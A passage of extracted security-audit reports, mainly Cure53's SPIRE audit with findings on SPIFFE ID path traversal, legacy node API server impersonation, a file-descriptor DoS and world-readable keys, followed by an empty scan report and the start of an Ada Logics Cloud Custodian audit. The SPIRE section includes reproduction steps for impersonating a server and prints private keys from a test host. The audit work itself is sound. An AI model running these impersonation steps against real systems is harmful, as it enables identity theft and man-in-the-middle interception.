establishing the initial trust. No issues were spotted here.\n•Multiple checks were executed against the SPIRE Workload API. The unix\ndomain socket was found to have permissions of 0777, meaning anyone on the\nsystem running the spire-agent can connect() to the socket and interact with it.\n•The developers are also aware that the workload API socket is completely\nunauthenticated.\n•The workload API was found to have no rate-limiting implemented; the\ndevelopers are aware of the potential risk of a malicious workload attempting to\nDoS the agent (assuming discover_workload_path is set to true) by enforcing the\nagent to calculate the sha256 checksum of very large binaries during attestation.\n•Workload attestation is a crucial component of SPIRE and any ways of\nsubverting workload attestation could result in stealing identities of neighboring\nworkloads. No issues were spotted in this area.\n•Special attention was given to the implementation of the JWT token verification\nthe software in scope performs; no issues were spotted though.\n•The team also inspected the implementation of the node attestators for the\nagent. Node attestation is best being performed on a case-by-case basis, e.g.\nleveraging AWS or GCP-based node attestation implies that the computing\nplatform is assumed to be trustworthy, and leveraging Kubernetes for workload\nattestation implies that the Kubernetes deployment is assumed to be trustworthy.\n•The join_token is responsible for attesting the agent's identity using a one-time-\nuse pre-shared key. Here, the team checked the generation of the Join token,\nwhich is using uuid.newV4(). Its validation on the SPIRE server-side was also\nreviewed.\n•Further checks in this realm included auditing of the code for potential integer\noverflows / underflows as well as potential race condition vulnerabilities and\nTOCTOU issues. No discoveries were made.\n•Audits were also performed against the peertracker, with a particular focus on\nLinux. One potential file descriptor leak results in a Denial-of-Service situation\ndescribed in SPI-01-006.\n•Cure53 paid attention to the active-active setup between granola-regional-1 and\ngranola-regional-2. Both server instances have the same datastore settings and\nserver configurations. Such a setup is solely achieved through the configuration\nof all servers in the same trust domain to read and write to the same shared\ndatastore. One of the goals of reviewing such an active-active setup was to\nCure53, Berlin · 02/10/21 15/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nidentify potential attacks that should only be performed once and how an active-\nactive cluster mitigates the risk of an attacker racing in such scenarios.\n•The upstream authority setup between granola-regional-1, granola-regional-2\nand granola-global has been reviewed but no issues have been identified.\n•The team also looked into go-spiffe’s particulars in terms of fetching and\nvalidating SVID’s, but no issues worth-reporting have been spotted.\n•Finally, checks were also performed against the Federation features, but no ways\nof subverting the federation relationship have been spotted.\nIdentified Vulnerabilities\nThe following sections list both vulnerabilities and implementation issues spotted during\nthe testing period. Note that findings are listed in chronological order rather than by their\ndegree of severity and impact. The aforementioned severity rank is simply given in\nbrackets following the title heading for each vulnerability. Each vulnerability is\nadditionally given a unique identifier (e.g. SPI-01-001) for the purpose of facilitating any\nfuture follow-up correspondence.\nSPI-01-003 WP2: Path normalization in Spiffe ID allows impersonation (Medium)\nIt was found that the SPIRE implementation applies unspecified, undocumented and\ninconsistent path normalization when parsing or constructing the Spiffe ID. The path\nnormalization is occasionally applied by SPIRE and was adopted from the filesystem\nwith respect to anomalies like the current (./) or parent (../) directory.\nThis allows adversaries to launch a path traversal attack when user-supplied data is\nembedded within the path part of the Spiffe ID. This path traversal attack can be\ncombined with encoded URL entities that are inconsistently decoded. This allows for\nseveral bypasses of security checks and could lead to the misidentification or\nimpersonation of another node, agent or server.\nAffected File:\nsupport/k8s/k8s-workload-registrar/mode-reconcile/controllers/pod_controller.go\nAffected Code:\nfunc (r *PodReconciler) makeSpiffeIDForPod(pod *corev1.Pod) *spiretypes.SPIFFEID\n{\n var spiffeID *spiretypes.SPIFFEID\n switch r.Mode {\n case PodReconcilerModeServiceAccount:\n spiffeID = r.makeID( path.Join(\"/ns\", pod.Namespace, \"sa\", \npod.Spec.ServiceAccountName) )\n case PodReconcilerModeLabel:\nCure53, Berlin · 02/10/21 16/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \n if val, ok := pod.GetLabels()[r.Value]; ok:\n spiffeID = r.makeID( path.Join(\"/\", val) )\n case PodReconcilerModeAnnotation:\n if val, ok := pod.GetAnnotations()[r.Value]; ok:\n spiffeID = r.makeID( path.Join(\"/\", val) )\n }\n return spiffeID\n}\nThe Kubernetes workload registrar can be configured to use the value of a Kubernetes-\nspecific pod label. If the value of this pod label is partially or fully attacker-controlled, the\npath normalization applied by path.Join can be used to specify an arbitrary identity. A\nsimilar approach was used for some node attestator plugins, allowing to configure the\ntemplate for the attested Spiffe ID to include potentially user-controlled data, such as the\nAWS instance tags, prior to path normalization.\nAffected File:\npkg/common/idutil/spiffeid.go\nAffected Code:\nfunc AgentURI(trustDomain, p string) *url.URL {\n return &url.URL{\n Scheme: \"spiffe\",\n Host: trustDomain,\n Path: path.Join(\"spire\", \"agent\", p) ,\n }\n}\nAttackers could occasionally use URL encoding to the path traversal attack as the path\nof a Spiffe ID are sometimes URL-decoded by Spiffe with the Parse function of Go’s\nbuilt-in url package.\nAffected File:\npkg/common/idutil/spiffeid.go\nAffected Code:\nfunc ParseSpiffeID(spiffeID string, mode ValidationMode) (*url.URL, error) {\n u, err := url.Parse(spiffeID)\n [...]\n return normalizeSpiffeIDURL(u), nil\n}\nCure53, Berlin · 02/10/21 17/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nThe Spiffe specification leaves the interpretation of the path of a Spiffe ID to the\nadministrator. On the one hand, specifying the Spiffe ID as an URL comes with the\ncomfort and rich presence of many parsers that can be used from all languages. On the\nother hand, this diversity pairs tightly with differences in the URL parsing, path and\ncharacter normalization. This can be a covert security pitfall when the verifier or the\nissuer treats two distinct entities with ambiguous identities.\nIt is recommended to mention within the Spiffe specification that the interpretation of the\nSpiffe ID MUST be consistent across all workloads, agents and servers, especially those\nincluding any path normalization like URL decoding, Path Normalization or Unicode\nNormalization. This could be supported by supplying a reference/default interpretation\nand, perhaps, supplemented with an implementation of parsing the Spiffe-ID in multiple\nlanguages.\nSPI-01-004 WP2: Server impersonation through legacy node API (High)\nIt was found that the legacy node API suffers from a logical flaw that allows malicious\nagents to request and receive a x509 peer certificate for other workloads, agents or\nservers within the same trust domain. The handler of the FetchX509SVID method\noffered by the server's legacy gRPC node API does not properly validate the Spiffe ID\nbut only validates the entry ID associated with certificate signing requests received from\nauthenticated agents.\nThis handling signifies the risk of malicious or compromised agents performing identity\ntheft or impersonation attacks against any peers of the trust domain. The issue could be\nabused to perform Man-in-the-Middle (MitM) attacks intercepting sensitive information.\nAffected File:\npkg/server/endpoints/node/handler.go\nAffected Code:\nfunc (h *Handler) buildSVID(ctx context.Context, id string, csr *CSR, regEntries\nmap[string]*common.RegistrationEntry) (*node.X509SVID, error) {\n entry, ok := regEntries[id]\n if !ok {\n [...]\n return nil, errors.New(\"not entitled to sign CSR for given ID type\")\n }\n svid, err := h.c.ServerCA.SignX509SVID(ctx, ca.X509SVIDParams{\n SpiffeID: csr.SpiffeID,\n PublicKey: csr.PublicKey,\n TTL: time.Duration(entry.Ttl) * time.Second,\n DNSList: entry.DnsNames,\nCure53, Berlin · 02/10/21 18/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \n })\nLog File Excerpt:\nJan 24 13:24:52 granola-regional-2 spire-server[1212]: ... msg=\"This API is \ndeprecated and will be removed in a future release\" method= /spire.api.node.Node/\nFetchX509SVID subsystem_name=api\nJan 24 13:24:52 granola-regional-2 spire-server[1212]: ... msg=\" Signing SVID\" \naddress=\"54.184.34.192:56706\" \ncaller_id=\"spiffe://granola-co/spire/agent/aws_iid/006101183245/us-west-2/i-\n00a447038625dd336\" spiffe_id=\" spiffe://granola-co/spire/server \" \nsubsystem_name=node_api\nJan 24 13:24:52 granola-regional-2 spire-server[1212]: ... msg=\" Signed X509 \nSVID\" expiration=\"2021-01-24T14:24:52Z\" \nspiffe_id=\"spiffe://granola-co/spire/server \" subsystem_name=ca\nReproduction Steps:\n1.Receive the entryID of a workload for a targeted spire-agent\n2.Build the modified spire-agent via make\n3.Run the modified spire-agent via CLI as follows:\n◦spire-agent fetchx509 <targetServerAddress> <spiffeIDToBeSigned> \n<entryID> <certificateDirectory>\n4.For instance, use the following command as root from granola-workload:\n◦spire-agent fetchx509 'granola-co.spiffe.me:8081' 'spiffe://granola-\nco/spire/server' '7de77de9-6897-4f0f-917d-45de852dc2ee' \n/etc/spire/.data\n5.The response of the gRPC request will now be printed. If successful, it will\ncontain the signed x509 certificate. Additionally, the log file of the spire-server will\nmatch the excerpt from above.\nThe Spiffe ID of the certificate signing request should be confirmed to match the Spiffe\nID of the registration entry that is identified by the entry ID supplied by the agent.\nAlternatively, support for the legacy node API could be dropped, mitigating this\nvulnerability in full.\nSPI-01-006 WP1: File-descriptor leak inside Linux peertracker (Medium)\nDuring a review of the workload API, it was noticed that the spire-agent keeps track of\nworkload processes by having open file descriptors of the workload’s process\n/proc/<pid> entry. Under specific circumstances, the function newLinuxWatcher() does\nnot add the opened file descriptor to the returned linuxWatcher object.\nThis can, for example, occur whenever the function getStarttime(), invoked by\nnewLinuxWatcher() , returns an error message. An attacker could leverage this flaw and\ncause the agent’s peertracker to exercise this code path many, many times. Hitting the\nCure53, Berlin · 02/10/21 19/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nmaximum open file limit set by the Linux operating system would result in DoS. It has to\nbe noted that this value is configurable and potentially different on different Linux\nsystems, however, the provided test-servers had the limit of open file handles per\nprocess set to 1024.\nAffected File:\nspire/pkg/common/peertracker/tracker_linux.go\nAffected Code:\nfunc newLinuxWatcher(info CallerInfo) (*linuxWatcher, error) {\n// If PID == 0, something is wrong...\nif info.PID == 0 {\nreturn nil, errors.New(\"could not resolve caller information\")\n}\nprocPath := fmt.Sprintf(\"/proc/%v\", info.PID)\n// Grab a handle to proc first since that's the fastest thing we can \ndo\nprocfd, err := syscall.Open(procPath, syscall.O_RDONLY, 0)\nif err != nil {\nreturn nil, fmt.Errorf(\"could not open caller's proc directory:\n%v\", err)\n}\nstarttime, err := getStarttime(info.PID)\nif err != nil {\nreturn nil, err\n}\nreturn &linuxWatcher{\ngid: info.GID,\npid: info.PID,\nprocPath: procPath,\nprocfd: procfd ,\nstarttime: starttime,\nuid: info.UID,\n}, nil\n}\nIt is important to properly keep track of open file descriptors. Cure53 recommends\nclosing the opened file handle whenever getstarttime() fails, in order to eliminate the risk\nof DoS.\nCure53, Berlin · 02/10/21 20/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nMiscellaneous Issues\nThis section covers those noteworthy findings that did not lead to an exploit but might aid\nan attacker in achieving their malicious goals in the future. Most of these results are\nvulnerable code snippets that did not provide an easy way to be called. Conclusively,\nwhile a vulnerability is present, an exploit might not always be possible.\nSPI-01-001 WP1: Build-system lacks security flags (Low)\nWhile checking the properties of the compiled spire-agent and spire-server binaries, it\nhas been identified that the resulting binaries do not have the compiler time security\nhardening flags enabled. The following security hardening options - applicable and\nexecutable - are missing:\n•PIE (spire-agent and spire-server)\n•RELRO (spire-agent and spire-server)\n•Stack Canaries / Stack-Smashing Protection (spire-agent)\n•FORTIFY_SOURCE (spire-agent)\nA detailed description of the referred security hardening compiler flags can be found\nonline13.\nShell excerpt:\nThe following PoC demonstrates the lack of compile time security hardening flags by\nusing the checksec.sh14 utility on two of the provided server systems.\n34.214.21.89 (granola-global - Root Server)\nroot@granola-global:/home/ubuntu/tmp/checksec.sh# ./checksec --proc-all\n[...]\nCOMMAND PID RELRO STACK CANARY SECCOMP NX/PaX PIE FORTIFY\n[...]\n-server 450 Partial RELRO Canary found No Seccomp NX enabled No PIE Yes\n[...]\n54.149.236.250 (granola-regional-1 - Nested Server)\nroot@granola-regional-1:/home/ubuntu/tmp/checksec.sh# ./checksec --proc-all\n[...]\nCOMMAND PID RELRO STACK CANARY SECCOMP NX/PaX PIE FORTIFY\n[...]\n-agent 446 No RELRO No canary found No Seccomp NX enabled No PIE No\n-server 449 Partial RELRO Canary found No Seccomp NX enabled No PIE Yes\n[...]\n13https://wiki.archlinux.org/index.php/Arch_package_guidelines/Security#Golang 14https://github.com/slimm609/checksec.sh \nCure53, Berlin · 02/10/21 21/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nCure53 encourages the use of all existing compiler security features in order to raise the\nbar for attackers who aim to exploit vulnerabilities within SPIRE. The missing features\ncan be enabled by incorporating the following flags in the build-system:\nexport GOFLAGS='-buildmode=pie'\nexport CGO_CPPFLAGS=\"-D_FORTIFY_SOURCE=2\"\nexport CGO_LDFLAGS=\"-Wl,-z,relro,-z,now\"\nexport CGO_LDFLAGS='-fstack-protector'\nSPI-01-002 WP1: SPIRE server stores private key.json world-accessible (Medium)\nDuring an audit of the spire-server-related source code, it was noticed that the key.json\nfile, holding sensitive information such as JWT-Signer and x509-CA private keys, is\nopened and stored with file permissions 0644.\nThis insecure default file permissions grants read permissions to anyone. It is important\nto note that the configured umask of the Linux system, where the spire-server binary is\ninvoked, gets applied when creating the referred key.json file. Thus, the actual file\npermissions strongly depend on the configured umask value.\nAffected File:\nspire/pkg/server/plugin/keymanager/disk/disk.go\nAffected Code:\nfunc writeEntries(path string, entries []*base.KeyEntry) error {\ndata := &entriesData{\nKeys: make(map[string][]byte),\n}\nfor _, entry := range entries {\nkeyBytes, err := x509.MarshalPKCS8PrivateKey(entry.PrivateKey)\nif err != nil {\nreturn err\n}\ndata.Keys[entry.Id] = keyBytes\n}\njsonBytes, err := json.MarshalIndent(data, \"\", \"\\t\")\nif err != nil {\nreturn newError(\"unable to marshal entries: %v\", err)\n}\nif err := diskutil.AtomicWriteFile(path, jsonBytes, 0644) ; err != nil {\nreturn newError(\"unable to write entries: %v\", err)\n}\nCure53, Berlin · 02/10/21 22/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nreturn nil\n}\nThe following output was captured on the granola-local host and shows that sensitive\ninformation is stored within the referred keys.json file.\nShell excerpt:\nroot@granola-global:/etc/spire# cat keys.json\n{\n\"keys\": {\n\"JWT-Signer-A\": \n\"MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgnHN6i3MmltAFIunvAfFCGm65d0sxBOt\nXhny6gqf4xQqhRANCAAQ+u3j23JuqxnRHiuWjhuQ1cItJFluxRjTm+HVXENeq6KAX3QgqpxkarVuG+SZ\njS0A0TzoqJHd1M7yMvdD+zR19\",\n\"JWT-Signer-B\": \n\"MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgt9/m9kbtMmFmTNSVX1OukhId2B3fBIs\nFIKTPs4tUiiqhRANCAAQHP6raGmLbnrIQp5FzRSFTrVSEEbLh3tgXSgIxokHYnb9bVK9mJa+rpUjMw7r\nl77w7CWhqRKjEvevBRvhVFPNd\",\n\"x509-CA-A\": \n\"MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgRKQFwCWb/cWN2XM0gkz9P9Rt7O7LeG4\n2eJ7Tm7x/tgWhRANCAASI/\nPl5gMAxim1iD0tn0ILvkwz7N5JuyqluIvM4MZ050g8bWsus47jtzzbHi6VT6Xp/\nyDLM8fmWQtXsrvBOgYyA\",\n\"x509-CA-B\": \n\"MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgHtk+zLvKi4gpH1ILq3ywafZ3i/\nc4HOez3HV7IoyCwBWhRANCAAQIEDGWWk/HgBDBA1gRcRH01B/\nV+pbNdQVp63RrGQ0PQ7P1+Q5ScSD38qs8S2eKmQ1o9/rFdFTjusWqgGF0A/ru\"\n}\nIn the example output depicted above, the configured umask on the provided granola-\nlocal host prevented read access of the keys.json file because of the restrictive umask\nsettings.\nSensitive information, such as private-keys, should never be stored with file permissions\n0644. 0600 should be used instead, only granting read and write permissions to the\nowner of the file.\nSPI-01-005 WP1: SPIRE links against outdated third-party modules (Medium)\nWhile reviewing all third-party dependencies that are linked within SPIRE-v0.12’s\ncodebase, it was noticed that the go.mod file (the file that lists all dependency\nrequirements and their versions) contains a list of outdated modules. A few noteworthy\nmentions are enumerated in the list below.\nCure53, Berlin · 02/10/21 23/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nExcerpt with outdated modules:\n•github.com/Azure/azure-sdk-for-go\n◦Linked v44.0.0 instead of v50.1.0\n•github.com/mattn/go-sqlite3\n◦Linked v1.10.0 instead of v1.14.6\n•github.com/sirupsen/logrus\n◦Linked v1.4.2 instead of v1.7.0\n•github.com/jinzhu/gorm\n◦Linked v1.9.9 instead of v1.9.16\n•etc…\nEspecially newer versions of the mentioned gorm library contain fixes for one CVE15 that\nwas reported for versions below 1.9.10. Although the patch for this CVE was reverted at\nsome point (since it can be considered a non-issue), the current situation with the\ndependency management is not optimal. At present, especially security fixes that\nhappen during version changes will go unnoticed. This is also mentioned in the maturity\nsection in the beginning of this report where potential automated solutions are\nhighlighted. It is recommended to make sure that version changes for dependencies are\nincluded in the build process of SPIRE.\nSPI-01-007 WP1: Path traversal in Spiffe ID via potentially unsafe join token (Info)\nIt was found that the join token supplied by the user is then used for the attested Spiffe\nID. This could be dangerous if the datastore plugin cuts the join token16 or performs\nmutations on the join tokens before looking them up. This could be abused to bypass the\nallow-list and perform attacks similar to SPI-01-003.\nAffected File:\npkg/server/api/agent/v1/service.go\nAffected Code:\nfunc (s *Service) attestJoinToken(ctx context.Context, token string) \n(*nodeattestor.AttestResponse, error) {\n log := rpccontext.Logger(ctx).WithField(telemetry.NodeAttestorType, \n\"join_token\")\n resp, err := s.ds.FetchJoinToken(ctx, &datastore.FetchJoinTokenRequest{\n Token: token,\n })\n [...]\n15https://www.cvedetails.com/cve/CVE-2019-15562/ 16An example of a similar flaw in MySQL is illustrated here: \n https://mathiasbynens.be/notes/mysql-utf8mb4\nCure53, Berlin · 02/10/21 24/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \n tokenPath := path.Join(\"spire\", \"agent\", \"join_token\", token)\nIt is recommended to use the join token returned by the datastore instead of using the\none sent by the agent. By doing so, implementation flaws of the datastore that cut the\njoin token at specific characters or internally before looking them up are mitigated by\ndesign.\nSPI-01-008 WP1: Anti-SSRF hardening not applied for SDS API (Info)\nIt was found that additional hardening gained through the anti-SSRF token is only\napplied to the workload API. This introduces the risk of software that runs on the\nworkload being prone to a non-blind SSRF vulnerability, potentially granting attackers\naccess to the unhardened Secret Discovery Service (SDS).\nAffected File:\npkg/agent/endpoints/middleware.go\nAffected Code:\nfunc verifySecurityHeader(ctx context.Context, fullMethod string) \n(context.Context, error) {\n if isWorkloadAPIMethod(fullMethod) && !hasSecurityHeader(ctx) {\n return nil, status.Error(codes.InvalidArgument, \"security header missing\nfrom request\")\n }\n return ctx, nil\n}\nIt is recommended to accept but consider this risk in the security section of the\ndocumentation pertinent to configuring SDS. Relevant endpoints of the workload API\nshould be listed to have the users additionally informed that the SDS API is unprotected\nagainst SSRF attacks.\nCure53, Berlin · 02/10/21 25/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nConclusions\nThis comprehensive report demonstrates that the SPIRE project, which is the SPIFFE\nRuntime Environment, has been created with security in mind. The involved members of\nthe Cure53 team, who were commissioned by CNCF to complete this broadly-scope\nsecurity examination in January 2021, could not find any severe (or Critical) security\nflaws within the SPIRE complex.\nDespite an in-depth review of various high impact components of SPIRE, the work\nasserted the maintenance of high security levels. The meanwhile pretty massive\ncodebase of SPIRE made a solid impression, clearly showcasing that the in-house\ndevelopers are aware of secure programming principles.\nThe choice of the programming language, GoLang, positively contributes to the general\nsecurity posture and reduces the exposure to risks. In addition, it eliminates some bug\nclasses significantly, as is the case with memory corruption issues and the likes often\nfound in C/C++. Cure53 must underline that the SPIRE workload attestation API is a\nvery interesting target for attackers, meaning that it should be protected with uttermost\nscrutiny. It was not possible to subvert the workload attestation process, however, one\npotential Denial-of-Service issue has been spotted ( SPI-01-006).\nThe examination revealed that the Go build process has not been taking full advantage\nof existing binary protection flags hardening, which exposes SPIFFE binaries to potential\nexploitation vectors ( SPI-01-001). Due to the provided setup, an audit of some platform\nspecific plugins, e.g. Kubernetes and docker workload attestation, was only possible\nfrom a static code analysis perspective. Considering the maturity of the SPIFFE/SPIRE\ndesign concept and its architecture, Cure53 was left with a very good impression on the\nwhole.\nTo reiterate, the codebase, together with its extensive documentation, is very clean,\nwell-structured and easy to follow. Despite the fact that there are some weaknesses\nhere and there, like outdated third-party libraries (see SPI-01-005), or lacking input\nvalidation (as in SPI-01-004), the overall quality of the whole project can be judged as\nquite mature.\nNote that issue SPI-01-004 presents an attractive attack-vector for attackers who wish to\nescalate the identity of a spire-agent into a spire-server. Its presence stresses the\nimportance of SPIRE's decision to remove the deprecated legacy node API. While this\nwas found to be an anomaly, SPI-01-001 was present throughout the examined code of\nSPIRE. This seems to be a more fundamental issue that could have arisen from the\nSPIFFE specification. The security-relevance of building, parsing and interpreting\nCure53, Berlin · 02/10/21 26/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de · mario@cure53.de \nSPIFFE IDs consistently in all environments of all federated Trust Zones is thereby\nresonated. In addition, the specification could stress the danger of embedding user input\ninto attested SPIFFE IDs while applying Path Normalization as observed in SPI-01-001\nor SPI-01-007.\nJudging by the rest of the issues and the complexity of the project, it can be argued that\nthe developers of the reference implementation of SPIFFE have proven their awareness\nof modern vulnerabilities. The mitigations they have crafted and utilized are capable of\nreducing the attack preponderance of the SPIRE complex on the whole, as evident from\na small number and generally limited numbers of findings. This is especially impressive\nin the face of the sheer size of the codebase, indicating that there really is not that much\nto improve from the auditors’ perspective. With remediation of the issues highlighted by\nCure53 above, the already high level of security would be increased even further.\nFinally, it is important to stress the good flow and efficiency of the communication\nbetween the testers and the SPIFFE team. No questions were left unanswered and the\nprovided self-security assessments fostered understanding the concepts and security\nmodel of the whole project. Additional material regarding potential attacker models and\ngreater worries also served the purpose of streamlining testing efforts. To conclude,\nwhile several issues were spotted and documented in this January 2021 project, the\noverall impressions of the state of security and its documentation are positive. It is clear\nthat the SPIRE project maintainers are on the right track regarding security.\nCure53 would like to thank Andres Vega, Agustín Martínez Fayó, Andrew Harding and\nEvan Gilman from the SPIRE team as well as Chris Aniszczyk of The Linux Foundation,\nfor their excellent project coordination, support and assistance, both before and during\nthis assignment. Special gratitude needs to be extended to The Linux Foundation for\nsponsoring this project.\nCure53, Berlin · 02/10/21 27/27" } ]
{ "category": "Provisioning", "file_name": "Security Report for Security Test 2 2021-04-14 19_53_06.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 2\nin Project 6/Security Test Suite 2/https://164.90.157.161 TestCase\nSummary\nStarted at 2021-04-14 19:53:06\nTime taken 00:03:40.385\nTotal scans performed: 1726\nIssues found: 0" } ]
{ "category": "Provisioning", "file_name": "Ada-Logics-security-audit-2023-report.pdf", "project_name": "Cloud Custodian", "subcategory": "Automation & Configuration" }
[ { "data": "Cloud Custodian Security Audit 2023\nSecurity Audit Report\n(Arthur) Sheung Chi Chan, Adam Korczynski, David Korczynski\n17 apr 2024Cloud Custodian Security Audit 2023 17 apr 2024\nContents\nAbout Ada Logics 3\nProject dashboard 4\nExecutive summary 5\nThreat model 6\nMain components in scope . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6\nCore package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7\nCloud service providers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7\nSupporting tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7\nThird party components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8\nCloud Custodian policies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8\nPolicy validation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9\nPolicy continuous integration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9\nData flow for Cloud Custodian . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9\nEntry through Cloud event triggering . . . . . . . . . . . . . . . . . . . . . . . . . . . 11\nTrust Boundaries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13\nThreat actors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13\nAttack surface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14\nAttacker objectives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17\nPrivilege escalation in the cloud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17\nMess up with services and resources of the cloud . . . . . . . . . . . . . . . . . . . . . 17\nGain information from the cloud services and resources . . . . . . . . . . . . . . . . . 17\nFuzzing 18\nfuzz_actions_parser . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18\nfuzz_actions_process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18\nfuzz_actions_validate . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19\nfuzz_filters_parser . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19\nfuzz_filters_process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19\nfuzz_filters_validate . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19\nfuzz_gcp_actions_validate_process . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20\nfuzz_gcp_filters_validate_process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20\nfuzz_gcp_resources_process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20\nfuzz_query_parser . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20\nfuzz_resources_parser . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20\nCloud Custodian Security Audit 2023 1Cloud Custodian Security Audit 2023 17 apr 2024\nfuzz_resources_process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21\nfuzz_resources_validate . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21\nSLSA review 22\nFound issues 24\nUse of a broken or weak cryptographic hashing algorithm for sensitive data 25\nMitagation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26\nInsecure temporary file creation 27\nVulnerable code location . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27\nMitigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28\nMissing sanitisation in using Jinja2 library 29\nMitigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30\nUsing deprecated and insecure ssl.wrap_socket 31\nVulnerable code location . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31\nMitigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31\nRemark . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32\nIndex out of range in ARN parser 33\nMitigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33\nImproper URL substring validation can leak data 34\nMitigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35\nPossible DoS from attacker-controller Github account 36\nMitigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38\nPossible DoS from attacker-controller Github repository 39\nMitigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40\nPossible zip bomb from large S3 object 41\nMitigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42\nPrivilege escalation through chained Lambda functions in AWS 43\nCode for lambda function terminate_instance . . . . . . . . . . . . . . . . . . . . . . 45\nProof of concept . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45\nImpact . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47\nCloud Custodian Security Audit 2023 2Cloud Custodian Security Audit 2023 17 apr 2024\nAbout Ada Logics\nAda Logics is a software security company founded in Oxford, UK, 2018 and is now based in London.\nWe are a team of pragmatic security engineers and security researchers that work hands-on with code\nauditing, security automation and security tool development.\nWe are committed open source contributors and we routinely contribute to state of the art security\ntooling in the fuzzing domain such as advanced fuzzing tools like Fuzz Introspector and continuous\nfuzzing with OSS-Fuzz. For example, we have contributed to fuzzing of hundreds of open source\nprojects by way of OSS-Fuzz. We regularly perform security audits of open source software and make\nour reports publicly available with findings and fixes, and we have audited many of the most widely\nused cloud native applications.\nAda Logics contributes to solving the challenge of securing the software supply-chain. To this end, we\ndevelop the tooling and infrastructure needed for ensuring a secure software development lifecycle,\nand we deploy these tools to critical software packages. On the tooling and infrastructure side, we\ncontribute to projects such as the OpenSSF Scorecard project as well as the Sigstore projects like SLSA\nand Cosign.\nAda Logics helps some of the most exposed organisations secure their software, analyse their code\nand increase security automation and assurance, and if you would like to consider working with us\nplease reach out to us via our website.\nWe write about our work on our blog and maintain a YouTube channel with educational videos. You\ncan also follow Ada Logics on Linkedin and X.\nAda Logics ltd\n71-75 Shelton Street,\nWC2H 9JQ London,\nUnited Kingdom\nCloud Custodian Security Audit 2023 3Cloud Custodian Security Audit 2023 17 apr 2024\nProject dashboard\nContact Role Organisation 